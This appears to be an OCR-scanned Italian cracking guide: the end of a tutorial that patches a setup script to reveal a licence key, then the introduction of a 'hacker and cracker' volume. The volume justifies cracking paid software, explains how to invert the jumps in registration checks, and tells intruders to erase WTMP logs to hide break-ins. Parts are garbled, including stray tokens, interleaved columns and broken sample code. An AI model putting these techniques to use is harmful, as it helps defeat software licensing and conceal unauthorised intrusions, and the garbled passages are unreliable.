IsLicKeyValid -- Returns true if number is legal. 


cioe' se la licenza inserita e' giusta riporta True (vero) (e' quindi di 
tipo booleano VERO/FALSO; per maggiori infos leggete un libro di matematica 
o di programmazione) 


Bene, avanti così' ! 
Scrolliamo un po' la routine fino a che, to' guarda qui, troviamo un bel 


IF (bufkey$ = n$) THEN IsLicKeyValid = TRUE 


GULP ! 

Spieghiamo un po' per i non-programmatori 

Se la stringa bufkey$ e' uguale a n$ allora IsLicKeyValid e' vero (cioe' 
abbiamo inserito la licenza giusta) 


Sempre Meglio :)) 


Quindi, probabilmente ci sarete arrivati, una stringa e' quella che ho messo 
io a caso e l'altra quella giusta ! 

Bastera' visualizzare le 2 stringhe per vedere quella mia e quella giusta !! 
Allora, siccome non so programmare in MSTEST BASIC cerco la funzione 
x visualizzare un messaggio, la scopiazzo spudoratamente e ci faccio una 
lieve modifica 


per esempio questa : 
t$ = "The drive letter is missing or invalid. Please enter a valid drive." 
r% = DoMsgBox(t$,"Cadra for Windows Setup") 


che visualizza un messagge box con scritto il contenuto di t$ 


e la piazzo prima di If.... modificata cosi' 


r% = DoMsgBox("La chiave corretta e': " + bufkey$,"Sprotezione Effettuata da 
Cavallo de Cavallis", MB_OK + MB_ICONEXCLAMATION ) 


P.S. Io so gia' che bufkey$ e' quella giusta, avrei dovuto prima mettere 
"le 1ma chiave e' "+ bufkey$ + " la 2nda e'" + n$ , osservarle, capire quale 
era quella giusta.. comunque ci siamo capiti. 


Beh riavviate il setup cosi' modificato ed eccovi visualizzata la chiave 
giusta !! 


P.S. Fatevi una copia di backup dei file PRIMA !! Non vorrete perdere il 
programma per un errore !! 


Bene ho concluso la mia piccola guida alla sopravvivenza per non-crakkatori. 
Spero di aver aiutato qualcuno, di non aver deluso nessuno, di non aver fatto 
incazzare nessun vero crakkatore (Se vi ho fatto inkazzare, fatemi un corso 
crackin oriented cosi' faccio cose piu' interessanti). 

Ringrazio InfectedMachine e lo staff di SyStEmDoWn per avermi permesso di 
inserire questo mio articolo, Xoanon per la sua guida al crack (se mi dessi 
anche lezioni non sarebbe male :)), pa' e ma'. 

Salutoni a tutti gli amici dei canali #hackers.it #hackita e #warezitalia 

senza i quali non avrei neanche saputo dell'esistenza di SystemDown. 


ULTIMO AVVISO: 

Non e' sempre facile trovare protezioni come quelle descritte, saranno magari 
il 5% o anche meno, ma ricordatevi Provate Provate Provate, puo' darsi che 
con l'inventiva si arrivi dove non arrivano le conoscenze. 


Cavallo de Cavallis 
<ratamatta@hotmail.com> 
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Tecniche, programmi e conoscenze per il cracking dei programmi. 
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Teoria dei debuggers, disassemblatori ecc. 

Teoria del software in rete. 

Teoria activeX e librerie. 
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programmi ad esempio sono stati camuffati ed è impossibile risalire all'origine. 
Le tabelle e gli scritti riportati sono espressamente DI PUBBLICO DOMINIO 0 ANONIMI. 
In ogni caso sono riprodotti nella loro forma originale compresa la lingua.” 
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INTRODUZIONE 


A 14 anni di distanza ecco quanto avevo promesso sul mio volume di 
programmazione in C a basso livello datato 1986. 

Ho ricevuto per anni telefonate dalle persone che lo avevano letto le quali mi 
chiedevano a che punto era quanto avevo promesso nelle ultime pagine. 

A dire il vero nel frattempo ho scritto altri volumi sulla programmazione in C 
in ambiente Unix, sulla programmazione in Java ma è inutile ... il volume che 
aveva colpito era quello destinato agli smanettoni del basso livello. 

Ok. 

Non è propriamente la continuazione di quello, in quanto a quei tempi il volume 
trattava le tecniche di scrittura dei TSR in C ma ora sotto Windows 2000 di TSR 
se ne parla ben poco. 

In compenso il basso livello, più basso di cosi si muore, rinasce nel mondo dei 
crackers (non della Pavesi) i quali seguono le trame ingarbugliate dei software 
per autofinanziarsi irraggiungibili, in altro modo, librerie e software vari. 

Un buon sistema di sviluppo costa svariati milioni. 

3.000.000 circa per Developper Studio Enterprise. 

800.000 per la libreria che gestisce lo strato database ecc. 

900.000 per quella che gestisce le list box. 

E chi sviluppa in Java o C++ sicuramente ha anche bisogno di un editor html da 
L. 1.000.000 ecc. 

E disegni legati alla grafica dove li mettiamo ? 

Altri 800.000 per un Firework. 

Gli studenti e tutti coloro che non possono passare sotto il budget dell'azienda 
il costo del software sarebbero destinati a guardare. 

Ed invece no ! 

La tecnica dell’autofinanziamento funziona. 

Grazie a Internet ci sono migliaia di software limitati a 60 giorni o similia 
che sono li pronti ad accettare la sfida del crackatore folle. 

Colui che produce software compra i pacchetti originali perchè è impensabile 
distribuire un prodotto creato con software crackati. 

Chi grida all’ingiustizia per il fatto che qualche smanettone si autofornisce 
di software perchè non grida all’ingiustizia quando invece si spende dei milioni 
per trovarsi nelle mani dei software scritti da cani e destinati a cani ? 

Io personalmente ho reso ricche software house americane e Federal Express 
comprando centinaia e centinaia di software con il solo scopo di provarli. 
Un’altra cosa che spero vivamente è che il testo non vi aiuti ulteriormente a 
rendervi più strani, anche perché papà e mamma sono già abbastanza perplessi 
oggi come oggi senza che dobbiate peggiorare ulteriormente !! (Scherzo!!) 

Il consiglio migliore che vi posso dare è comunque quello di mantenere un 
briciolo di umiltà pensando che spesso dalla parte delle protezioni esistono 
professionisti veramente bravi. 

Questo non significa che alcuni programmi non si possono sbloccare ma solo che 
bisogna sempre valutare se il tempo perso vale il gioco. 

Sicuramente poterete fare di qualsiasi caso una sfida e se le cose stanno così 
non c’è da fare neppure un'altra parola. 

Se invece per sproteggere un formattatore di sorgenti C ci vuole un mese, forse 
è meglio che lasciate perdere e il tempo lo impiegate a riscriverlo per vostro 
conto. 

Nel 1981 iniziai a lavorare vicino a sistemi che a quei tempi possedevano le 
dimensioni di una stanza. 

Fare il consulente in informatica significava dover affrontare progetti legati 
ai settori più disparati ovvero quelli per cui i clienti ti contattavano. 

Se arrivava la Fiat e necessitava del programma di controllo della qualità 
dovevi affermare in partenza di conoscere l’argomento e successivamente dovevi 
sudare sette camicie per farti una cultura sufficiente a poter risolvere il 
problema. 

Appunto per fare questo bisognava avere il software giusto al momento giusto ed 
è questo il motivo delle centinaia di acquisti. 


Quanti pacchi ma PACCHI in maiuscolo mi sono preso ! 

Allora li cosa si doveva fare ? 

Milioni spesi per software che se fossero stati distribuiti gratis ci si sarebbe 
dovuti incazzare per aver speso 900 L per ogni floppy di supporto. 

Comunque la logica di anni fa è la stessa che ho oggi. 

Questo volume vuole distribuire informazioni e non software crackati. 

Reperire le informazioni, anni fa, era importantissimo anche perchè verso la 
metà degli anni 80 i volumi erano rarissimi. 

Da qui mi venne l’idea di creare un qualche cosa che potesse permettere a 
persone con interessi comuni di dialogare e quindi di scambiarsi le esperienze. 
Per questo nacque l’idea di fondare con alcuni altri la rete FidoNet italiana. 
Per circa 8 anni sono stato il secondo nodo italiano dopo quello di Giorgio 
Rutigliano di Potenza. 

Era il 1985 e la telematica viaggiava con i suoi 300 bauds proprio all’inizio 
del suo cammino. 

La stampa ci prese come un fatto innovativo. 

In Italia non esistevano ancora sistemi telematici pubblici e gratuiti come 
invece in America era tempo che c’erano. 

E come tutte le cose nuove venne vista anche con delle ottiche sbagliate ovvero 
per anni ci fu imputato di essere un covo di hackers. 

Chiaramente la rete supportava la messaggistica per cui non si poteva negare che 
poteva essere anche usata per scambiare passwords di sistemi privati. 

Non era comunque possibile eliminare il problema perchè non era possibile 
leggere tutti i messaggi che circolavano sulla rete stessa. 

Chiaramente poi chi violava i sistemi informatici possedeva un modem e quindi 
utilizzava anche le BBS. 

Per stare sulla rete scrissi i programmi in C denominati ITALINK (1986) che 
gestivano tutte le sezioni classiche di una BBS FidoNet ed in più disponevano di 
una sezione per le interrogazioni su basi dati. 

In tutti questi anni venni a conoscenza di quella che era la realtà hacker anche 
se la mia visione non è quella negativa posseduta da molti anzi 

Per me l’ hacker era una persona che doveva disporre di conoscenze informatiche 
molto maggiori della media ed era anche logico in quanto per poter trovare i 
buchi dei sistemi bisognava conoscerli molto bene. 

Nel 1987 partecipai anche ad una seconda rete nata in quel periodo che si 
supportava sul sistema di Unix UUCP. 

Al giorno d’oggi con le logiche Windows per settare una rete premi due tasti e 
scrivi due numeri. 

Settare UUCP era invece una cosa da pazzi. 

Decine e decine di file con dati incrociati tra loro con centinaia di 
informazioni da settare. 

Il file xxx conteneva i dati dei modem il cui numero doveva essere riportato nel 
file yyy il quale conteneva la velocità che doveva essere specificata nel file 
ZZz e così via. 

Molti crack ai sistemi furono fatti usando i bugs del sistema uucp. 

In pratica conoscendo il mailer di UUCP veniva spedito un messaggio con il 
sorgente del file usato per creare la door il quale, una volta giunto, usando 
l’esecutore sempre di UUCP veniva compilato ed eseguito. 

E questo era solo un esempio di fatti che comunque denotavano conoscenze molto 
profonde dei sistemi. 

Diciamo che in ogni caso tutte le tecniche di hackeraggio sono quasi sempre 
basate sull’inesperienza di alcuni sistemisti. 

Molti buchi sono accentuati dal fatto che molti sistemisti usano il loro accesso 
come root per attivare procedure atte a gestire funzioni pubbliche. 

Per essere più chiari possiamo portare l’esempio dei server WEB dove i programmi 
di gestione HTTP vengono lanciati come processi di proprietà root. 

In questo caso mediante alcuni cavalli di troia ed altre tecniche basate su 
problemi di FTP e del gestore delle EMAIL è possibile creare accessi non 
autorizzati ai sistemi. 

Una delle fasi fondamentali dell’hackeraggio sta’ nella capacità di eliminare 
tutte le tracce di accesso al sistema. 


Dopo essere entrati in sistemi Unix dovrà essere cura dell’hacker quella di 
cancellare i file WTMP ecc. ed in particolare modo non dovranno essere usate 
certe procedure adatte ad uscire dal sistema hackerato. 

Comunque se il super user del sistema non analizza i files di log allora non 
esiste nessun problema anche nel caso in cui l’hacker non faccia sparire le 
tracce. 

Il volume di intitola hacker and cracker in quanto sono due cose differenti. 
Hacker significa accedere ai sistemi remoti senza<a disporre delle 
autorizzazioni necessarie. 

Cracker significa eliminare le protezioni e le limitazioni dei programmi 
commerciali distribuiti. 

In ogni caso bisogna sottolineare la differenza tra hacker e imbecilli. 

Il vero hacker utilizza le tecniche studiate per giungere ai suoi fini solo per 
aumentare il suo bagaglio culturale ed in ogni caso non per recare danni ai 
sistemi attaccati. 

Molti hacker corretti, ovvero quelli che si attengono alla vera filosofia, 
spesso lasciano messaggi al sistemista avvisandolo dei buchi del suo sistema 
aiutandolo ad eliminarli. 

Cancellare files o fare danni in generale significa solo aumentare il proprio 
bagaglio di demenzalità. 

Quando una persona dispone di un aggressività accentuata significa che 
psicologicamente ha dei problemi anche perchè una persona equilibrata con se 
stesso non dispone di quel senso che lo fa sentire grande solo quando attacca il 
suo prossimo. 

Usate le vostre capacità per aiutare gli altri. 

Se fate cracking su qualche programma non divulgatelo in formato sprotetto in 
quanto fareste un danno alla casa che lo ha prodotto. 

Rivoltate sempre su di voi quello che state compiendo e siate corretti a pensare 
se quello che state facendo vi farebbe piacere se fosse fatto a voi. 

In caso negativo non fatelo in quanto certe cose aiutano solo a far salire i 
prezzi del software e a rompere le scatole a persone che hanno famiglie da 
mantenere. 

Siate sempre modesti e non pensate che mettere su Internet un software con la 


scritta cracked by ... vi possa eleggere a ricercatori del MIT. 
Ho conosciuto tanti programmatori ed analisti con sensi di superiorità 
pazzeschi. 


In genere erano “bufaloni” che pensavano che dopo aver trovato con il debugger 
le parole segrete per diventare invincibili a DOOM possedevano le stesse 
capacità dei progettisti che hanno messo al mondo Java o similia. 

Considerarvi mediocri vi permetterà di evolvervi ed in particolare modo 
riconoscere le infinite maggiori capacità di alcuni vi permetterà di avere dei 
modelli a cui ispirarsi e da raggiungere. 

Io personalmente ho sempre avuto Marvin Minsky (padre dell’ AI) e K & R (i padri 
del Linguaggio C) come miti e traguardi (per me irraggiungibili). 

Considerate sempre la comunicazione tra persone con gli stessi interessi. 

Questo è il metodo migliore per evolversi. 

Si dice che l’uomo è l’animale più intelligente proprio perchè ha inventato il 
linguaggio al fine di comunicare agli altri della specie le proprie esperienze. 
Dato che fare cracking o hacking su sistemi o su programmi significa sfruttare 
la propria intelligenza in questo volume verranno mostrate le tecniche usate ma 
non verrà fatto riferimento a nessun prodotto specifico. 

Non verranno neppure comunicati numeri di serie e neppure passwords per accedere 
a sistemi remoti. 

Se vi interessano soltanto quelle è meglio che le ricerchiate tramite messaggi 
su Internet. 

Nel volume troverete nozioni teoriche legate all’uso di certi linguaggi 
(Assembler e CC), a certi softwares quali disassemblatori e debugger, a 
nozionismi di rete ed ai metodi per utilizzarle tramite JAVA. 

Diciamo che il volume vi indirizzerà verso il metodo migliore per passare le 
notti insonni. 

Come vedremo per crackare i programmi si devono possedere conoscenze che 
spaziano in molti settori e sicuramente nei più complessi. 


Questo volume vuole servire a darvi un’infarinatura d’alcune teorie e comunque 
vi servirà a passare di livello. 
Benvenuti nel mondo del cracking “fai da te”. 


Se il volume vi è piaciuto potete richiedere l’abbonamento agli altri volumi 
sempre scritti dal sottoscritto. 

L'abbonamento vi costa L. 30.000. 

Appena ricevute vi verrà inviato immediatamente un altro volume di 200 pagine 
sulla programmazione avanzata in Java. 


BERNARDOTTI FLAVIO 

VIA TRENTO, 10 

15040 MONTECASTELLO (AL) 
Tel. 0347 5610956 


CONOSCENZE TEORICHE E PRATICHE 


Un famoso detto afferma che “tutte le strade portano a Roma”. 

Informaticamente parlando potremmo trasformare il tutto in “tutti i linguaggi 
portano all’ Assembler”. 

Un ambito traguardo dell’ informatica e’ sempre stato quello di creare un 
linguaggio simile a quello naturale che permettesse di indicare ai computers le 
funzioni da svolgere parlandogli semplicemente insieme ed utilizzando per la 
creazione delle frasi la stessa sintassi e semantica della nostra lingua. 

Il software necessario a svolgere un compito di questo tipo sarebbe stato una 
cosa talmente complessa e grossa che la velocità d’esecuzione dei programmi 
sarebbe stata impossibile. 

Filosoficamente mi viene il dubbio che se si fosse giunti ad un punto simile 
l’uomo sarebbe diventato un deficiente a causa dell’assopimento mentale che ci 
sarebbe stato conseguenza a questo fatidico linguaggio. 

Oggi l’uomo conquista i suoi obbiettivi massacrandosi i dieci miliardi di 
neuroni che ha “n’ta capa”. 

Comunque non è questo luogo per fare discorsi di questo tipo. 

Fortunatamente l’uomo mangia pane e pasticci per cui utilizza la sua 
intelligenza per crearsene ogni giorno di nuovi e più complessi. 

Più diventa complesso il problema dell’interpretazione del linguaggio più 
diventa grosso ed impacciato il software dell’interprete o del compilatore. 
Purtroppo l’elettronica è sorda o perlomeno capisce solo una sottospecie di 
codice morse che è il linguaggio binario. 

Questo concetto è facile da comprendere visto che elettricamente lo stato logico 
0 (zero) può essere rappresentato da una mancanza di segnale mentre lo stato 
logico 1(uno) da quello in cui il segnale è presente. 

Erroneamente negli anni si è sempre considerata l’ informatica come la scienza 
dei computers. 

L’ informatica, come dice il nome, è l’arte di analizzare il mondo intorno a noi 
(informazioni) ricavandone i modelli matematici composti da dati descrittivi, 
quantitativi e qualitativi, e da istruzioni indirizzate a manipolarli. 

L'arte della programmazione nasce sempre dall'analisi dei sistemi reali. 

In altre parole i sistemi vengono osservati ricavandone i dati disponibili. 

Dopo averli scorporati si arriva alla fase della creazione degli algoritmi 
ovvero delle sequenze di operazioni che devono essere applicate ai dati per 
raggiungere una certa finalità. 

Dalla nascita della scienza informatica i sistemi analizzati sono diventati 
sempre più complessi e quindi le metodologie analitiche hanno dovuto adattarsi 
alle sempre maggiori complicazioni concettuali. 

Anche i linguaggi di programmazione, che altro non sono che i sistemi per 
creare i modelli eseguibili su computers, hanno dovuto adeguarsi ai cambiamenti. 
Prendiamo ad esempio i linguaggi a partire dal periodo commerciale 
dell'informatica tralasciando la preistoria legata all'informatica eseguita su 
sistemi da centri di calcolo. 

Il tipo d’informatica che ho appena definito parte dal 1981 anno in cui l’ IBM 
ha commercializzato il primo personal ovvero il PC con processore 8088 a 4.77mhz 
con la stupefacente quantità di memoria di 64Kbytes (non dimentichiamoci del 
floppy a 360 Kbytes). 

Il basic era residente su ROM anche se era possibile caricarne una versione più 
evoluta da floppy. 

Il GwBasic sembrò una cosa terrificante a confronto del Basic dato con PcDos. 

N. Wirth fondatore della Borland fece la sua fortuna con il Turbo Pascal un 
compilatore extra veloce che stava in 64 Kbytes di disco. 

La nascita della programmazione strutturata fu appunto sancita dal Turbo Pascal 
e dal C. 

I primi esempi di programmazione object oriented furono legate all’ Eiffel fino 
a giungere allo Smalltalk e al C++. 

Comunque tutti i sistemi alla fine dovevano essere tradotti in Assembler per 
poter essere eseguiti. 


L'evoluzione dell’hardware portò anche all’espansione dell’Assembler dei 
sistemi. 

Pensate che i primi processori disponevano come istruzioni solo della somma e 
della sottrazione per cui moltiplicazione e divisione dovevano essere eseguite 
grazie a sequenze di queste due e oggetti come lo stack erano inseriti, fissi, 
dentro ai processori stessi. 

La difficile vita dell’ Hacker e’ legata a questo linguaggio anche se la 
conoscenza di altri linguaggi facilita il tutto in quanto la traduzione in 
Assembler mantiene sempre una certa forma legata al compilatore che l’ha 
generata. 

Spesso è possibile sfruttare il compilatore per generare programmi in Assembler 
ed in particolare questa tecnica, che ora vedremo, è utile per togliersi dei 
dubbi. 

Che significa togliersi dei dubbi ? 

Spesso debuggando certi programmi, derivati da linguaggi ad alto livello, non si 
riesce a capire quali costrutti del linguaggio originale hanno originato quelle 
linee Assembler. 

Il compilatore Visual C (il compilatore Microsoft C) ha sempre posseduto un flag 
che permette di generare il file in MACRO ASSEMBLER del programma in C 
analizzato. 

Prendiamo il seguente programma, che esegue la copia di un array di 10 elementi 
dentro ad un altro, come esempio 


struct X { 
int a[10]; 
}i 
int array_uno[10] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 0 }; 
int array_due[10]; 


void copy_array(void) 


(*((struct XxX *)&array_due[0])) = (*((struct Xx *)&array_uno[0])); 


Dando al compilatore il comando 
cl /c /Fatest.asm test.c 


(/c = non eseguire il link /Fanome.asm = genera asm) 
Ed ecco come è stato tradotto 


TITLE text.c 
.386P 
include listing.inc 
if @Version gt 510 


.model FLAT 
else 
_TEXT SEGMENT PARA USE32 PUBLIC 'CODE' 
_ TEXT ENDS 
_DATA SEGMENT DWORD USE32 PUBLIC 'DATA' 
_DATA ENDS 
CONST SEGMENT DWORD USE32 PUBLIC 'CONST' 
CONST ENDS 
_BSS SEGMENT DWORD USE32 PUBLIC 'BSS' 
_BSS ENDS 
_TLS SEGMENT DWORD USE32 PUBLIC 'TLS' 
_TLS ENDS 
FLAT GROUP _DATA, CONST, _BSS 

ASSUME CS: FLAT, DS: FLAT, SS: FLAT 
endif 
PUBLIC _array_uno 


_DATA SEGMENT 


COMM _array_due:DWORD:0aH 


_array_uno DD 01H 
DD 02H 
DD 03H 
DD 04H 
DD 05H 
DD 06H 
DD 07H 
DD 08H 
DD 09H 
DD 00H 
_DATA ENDS 
PUBLIC _Copy_array 


_TEXT SEGMENT 
_Copy_array PROC NEAR 
; File text.c 


; Line 9 
push ebp 
mov ebp, esp 
push esi 
push edi 
; Line 10 
mov ecx, 10 ; 0000000aH 


MOV esi, OFFSET FLAT:_array_uno 
mov edi, OFFSET FLAT:_array_due 


rep movsd 
; Line 11 

pop edi 

pop esi 

pop ebp 

ret (0) 
_Copy_array ENDP 
_TEXT ENDS 


END 


Vediamo ora le conoscenze che l’ hacker deve possedere per arrivare al suo 
traguardo. 

Ricordo sempre che questa attività è una sfida all’intelligenza altrui. 
Ingegneri del software studiano i metodi per codificare e nascondere certe 
funzioni mentre gli altri facendo dei trace, a volte allucinanti, devono 
ricostruire la logica altrui cercando di ricreare gli algoritmi di codifica. 
Tante sono le conoscenze che bisogna possedere per non perdersi in questo 
labirinto. 

Programmi, debuggers, Assembler, linguaggi ecc. 

In questo volume cercherò di trattare tutto quello che serve anche se, come ho 
già detto, non si tratta di un manuale specifico di ogni argomento. 

Già l’ho detto, qui lo ripeto ed in futuro lo ripeterò ancora che non troverete 
riferimenti a programmi specifici anche perchè il volume non si intitola 
“Sproteggiamo Pincopal Soft.”. 

Voglio che questo volume rimanga nella legalità anche se i piantagrane avranno 
da farci delle polemiche anche perchè sicuramente non capiranno che lo scopo del 
volume è quello di cercare di divulgare alcune conoscenze tecniche. 

Inoltre non avrebbe alcun senso fare riferimenti precisi a programmi anche 
perchè gli interessi miei divergono da quelli di un altro per cui sicuramente 
potrebbe non esserci interesse nei confronti del software che utilizzo 
personalmente. 

Oltre a ciò non avrebbe neppure senso fare un volume con riportate le 
sprotezioni di n programmi. 

Per prima cosa perchè da un giorno all’altro cambiano i sistemi di gestione dei 
demo. 

Un altro motivo è che già esiste il sito ASTALAVISTA che riporta un motore di 
ricerca per le parole e i sistemi di crack per cui se vi interessasse un 


software per rendere effettivo un certo demo fareste sicuramente prima a 
collegarvi li. 

In questo volume troverete nozionismi relativi a qualsiasi argomento a partire 
dall’assembler per giungere a Java ed ai disassemblatori. 

Un cosa che fu detta relativamente al volume che scrissi 15 anni fa era che 
venivano riportati un numero veramente grosso di informazioni. 

In questo volume, almeno come tipologia, vengono riportate ancora più notizie 
utili. 

Ritornando al discorso relativo alla piena legalità di questo volume posso 
ancora dire che alcune tabelle reperite tra gli scritti tecnici sono PUBLIC 
DOMAIN e non provengono da volumi e manuali soggetti a Copyright. 

In ogni caso alcune tabelle sono rimaste originali per due motivi. 

Spesso la traduzione di scritti tecnici porta a strane interpretazioni e 
comunque in ogni caso trattandosi di scritti originali con la disponibilità ad 
essere distribuiti nella sua forma originale, non ho voluti modificarli neppure 
nella lingua. 

Le parti in lingua originale comunque è solo relativa ad alcune liste e tabelle 
e non a scritti descrittivi relativi a nozionismi tecnici. 

Il volume è indirizzato a persone che dispongono già di basi informatiche le 
quali sicuramente masticano l’inglese meglio di quanto mastichino l’italiano. 
Quante volte ho imprecato per traduzioni pazzesche le quali necessitavano del 
reperimento dei documenti originali per riuscire a capire di cosa si parlava. 
Per prima cosa diamo un occhiata ad un argomento che può sembrare banale ma che 
spesso è fondamentale per la riuscita dell’obbiettivo. 

Quando downlodiamo un programma che possiede un sistema per il suo funzionamento 
limitato ad un certo periodo, sicuramente al suo interno possiede una parte che 
permette di registrare il software eliminandogli tutte le limitazioni iniziali. 
Queste routine possono essere da molto semplici a enormemente complesse. 

Moduli software commerciali destinati a questi compiti possiedono complicazioni 
software notevoli tra cui cryptografia del software e tante altre trovate degli 
ingegneri delle software house che l’hanno prodotto. 

Moduli come VBOX ecc. sono comuni. 

A chiunque sarà capitato di vedere in apertura programmi la dialog in cui si 
avvisa dei giorni ancora a disposizione del software in modalità demo e sul 
quale sicuramente esiste il pulsante per inserire il codice e quindi registrare 
il software. 

Programmi come le Norton Utilities, quelli Macromedia ecc. circolano 
tranquillamente affidando a queste utility la sicurezza di loro stessi. 

Questi moduli generalmente si attengono a queste regole che stabiliscono il 
flusso del software. 

Quando premete il tasto registra vi compare la maschera in cui generalmente 
viene chiesto il nome e il codice. 

Successivamente avverrà 


(Original) 

A ESEGUI LA COMPARAZIONE DI QUANTO INSERITO CON I CODICI CORRETTI 
B SE IL CODICE NON E’ CORRETTO VAI AL PASSO D 

Cc MOSTRA IL RINGRAZIAMENTO PER IL CODICE CORRETTO E VAI A D 

D CHIUDI IL BOX E TORNA AL PROGRAMMA 


A questo punto le nostre reingenierizzazioni del software possono seguire 
diverse vie. 

La forma più brutale e la più semplice è quella che cambia solo il comportamento 
che il software tiene nel caso di non correttezza del codice. 

Nella seconda riga l'originale diceva SE CORRETTO VAI A D mentre ora dice SE 
SCORRETTO VAI A D. 


(CHANGING BYTES) 
A ESEGUI LA COMPARAZIONE DEL CODICE 


B SE INCORRETTO VAI A D 
C MOSTRA Il RINGRAZIAMENTO E VAI A D 


D CHIUDI IL BOX E TORNA AL PROGRAMMA 


Alcune volte esiste un solo numero corretto con il vostro nome inserito e quindi 
possedete il 99.99% delle possibilità che quello inserito non vada bene. 
In questo caso potete modificare la logica in: 


(reverse the condiction) 


ESEGUI LA COMPARAZIONE Del CODICE 
SE NON è CORRETTO NON ANDARE A D 
MOSTRA IL RINGRAZIAMENTO E VAI A D 
CHIUDI IL BOX E TORNA AL PROGRAMMA 


VOdr 


Una terza tecnica è la seguente: 
(One way conndictions) 


ESEGUI LA COMPARAZIONE DEL CODICE 

SE NON CORRETTO VAI A C 

MOSTRA IL RINGRAZIAMENTO E VAI A D 
CHIUDI IL BOX E TORNA AL PROGRAMMA 


DOqNrL 


L'ultima metodologia. 


(Tricky condictions) 


A ESEGUI LA COMPARAZIONE DEL CODICE 

B SE NON CORRETTO VAI A D 

C MOSTRA IL RINGRAZIAMENTO E VAI A D 
D CHIUDI IL BOX E TORNA AL PROGRAMMA 


Voglio sottolineare che non sempre tutte le metodologie funzionano anzi: alcune 
volte soltanto un metodo può essere applicato. 

Vediamo ora di elencare le tipologie di conoscenze e i tipi di programmi che 
bisogna avere e saper utilizzare. 

Seguirà un elenco dei programmi con alcune descrizioni aggiuntive. 


Linguaggio Assembler 


La fase di debug ovvero quella in cui si segue passo a passo le istruzioni di un 
programma per identificarne alcuni punti legati alla protezione avviene a 
partire dall’assembler. 

Inoltre le istruzioni che devono essere inserite per modificarne il 
funzionamento devono essere codificate sempre in asm. 

Sono anche richieste le conoscenze relative ai sistemi operativi usati dato che 
molte funzioni come ad esempio la lettura e la scrittura su disco ecc. vengono 
spesso eseguite tramite chiamate agli interrupts del OS o mediante chiamate di 
sistema. 

Nel caso in cui la meta sia quella di attivare programmi protetti o cose di 
questo tipo allora le conoscenze si limiteranno alle funzioni Bios e Dos. 
Quando invece si cerca di giungere ad aprire porte in sistemi remoti allora le 
conoscenze devono essere anche relative ai protocolli usati dalle reti come ad 
esempio TCP/IP ecc. 

Molte backdoor vengono aperte usando funzioni legate ai sistemi di posta 
elettronica inseriti al livello di sistema in 0S quali Unix, VMS o similia. 


Linguaggio C, Basic o Pascal 


La scrittura dei programmi per eseguire le patch può essere eseguita mediante 
uno di questi linguaggi. 


Se si cerca di aprire porte in sistemi remoti allora sarà necessario conoscere 
librerie di funzioni per tali linguaggi come potrebbe essere SuperTCP per la 
scrittura di software agganciata al protocollo TCP/IP. 

Sempre con questi linguaggi è possibile scrivere i programmi di ricerca delle 
password per i sistemi Unix. 

La conoscenza delle funzioni di libreria di alcuni linguaggi facilita la ricerca 
delle funzioni da utilizzare come condizioni nei breakpoint. 

Se cerchiamo di identificare il punto in cui viene letta la stringa di 
serializzazione di un programma e questo è scritto in C, alora i breakpoint li 
potremo inserire utilizzando come funzioni da intercettare GetDlgItemText e 
simili. 

Tutti i linguaggi utilizzano alla base le api di Windows per cui si potrebbe 
sempre cercare di intercettare quelle a basso livello. 

Chiaramente si complica il tutto in qanto il nostro programma importerà le 
funzione xxxxx che è contenuta nella DLL yyyyyy la quale a sua volta importa e 
fa riferimento alla funzione GetDlgItemText che è in user32.dll. 


Api di Windows ed Interrupts 


Molte funzioni eseguite dai programmi sono ottenute mediante la chiamata a 
funzioni delle api di Windows. Supponiamo che ad un certo punto in una maschera 
un programma richieda un codice sicuramente (o almeno probabilmente) verrà 
eseguita tramite una funzione GetDlgItemText che fa appunto parte del sistema di 
Windows. 

Molte protezioni sono agganciate ad interrupts di sistema che permettono 
l’accesso al disco o a porte seriali. 

Al fine di intercettarli è necessario conoscere la teoria sul loro 
funzionamento. 


Debugger e disassemblatori 


L’ esecuzione passo a passo del programma da colpire avviene tramite debugger. 
Il più famoso nell’ambiente è sicuramente SoftIce della NuMega. 

Molti debugger vengono forniti con i sistemi di sviluppo come ad esempio il 
Turbo Debugger della Borland o il CodeVview fornito con il compilatore C fino 
alla versione 2.0. 

WDASM è un ottimo programma e dispone di un infinità di opzioni. 

Si può fare una distinzione tra debugger e disassemblatore. 

Il primo visualizza e spesso permette di salvare il codice assembler anche se la 
sua funzione pribcipale è quella di seguire passo a passo il programma e quello 
di poter settare condizioni per interrompere il flusso a loro verificarsi. 
Alcuni prodotti svolgono 
sia la funzione di 
disassemblatore che 
quella di debugger mentre 
altri svologono solo una 


Load file E:xMicroangelo\muani.exe as 


funzione. 

Inoltre bisogna fare, nel 
oading segment | (EXE & BIN} SARO dei debuggers, 
Loading ffset ! (BIN) anche un altra 

differenzazione. 

(BIN) Windows è un sistema 


ILE GOSE6r multitasking per cui in 
un momento possono essere 


(NE) Analys15 options residenti in memoria più 
(PE) LI programmi e più DLL 


condivise tra questi. 


LL directory TI: Alcuni debuggers 
ML richiedono il nome del 
programma da debuggare e 


poi, dopo averlo 
caricato, segueno step by 


step quello. 
Alcune fnzioni che permettono di elencare le funzioni importate, l’heap, lo 
stack ecc. fanno r8iferimento a quelle specifiche del programma caricato. 
Altri debugger, come SoftIce, sono di sistema per cui dispongono di possibilità 
elevate anche se sono più complessi da utilizzare. 
SoftIce permette di debuggare drivers, devices ecc. ma il suo utilizzo è più 
complesso. 
Le sue funzioni possiedono argomenti che servono a specificare a quale processo 
si riferiscono. 
Ad esempio in un debugger si potrebbe settare un beakpoint in modo da fermare il 
programma nel caso in cui venga inviato un messaggio di WM_DESTROY. 
Se il debugger si riferisce al solo 
programma caricato non ci sono problemi. 
s3 Nel caso in cui ci s riferisca a tutti 
ni proess9i attivi nel sistema ci si 
dovrà prima usare una funzione che 
permetta di ricavare l’handle del task, 
del processon o della window a cui ci si 
vuole riferire e poi utilizzarla come 
argomento per il settaggio del 
breakpiont in modo che questo si 
riferisca solo al task interessato. 
Le funzioni di softice permettono di 
visualizzare le classi, i task, gli ID 
dei processi, glihandle delle windows 
ecc. 
Programmi come IDA non possiedono 
fyunzioni da debugger ma creano sorgenti 
asssembler di qualità superiore agli 
altri. 
L'analisi fatta da IDA è elevata e i 
parametri per la creazione del source 
ASM sono tanti. 
IDA inoltre gestisce molti processori e già in fase di lettura iniziale del 
programma riesce ad identificare i moduli associati e permette di specificare 
molte opzioni di analisi. 
IDA possiede caratteristiche superiori per quanto riguarda la ricostruzione dei 
data segment sino a riuscire a identificare, in alcuni casi, strutture e oggetti 
riferiti appunto ai dati. 
WDASM possiede un buon fattore relativo alla precisione del sorgente assembler 
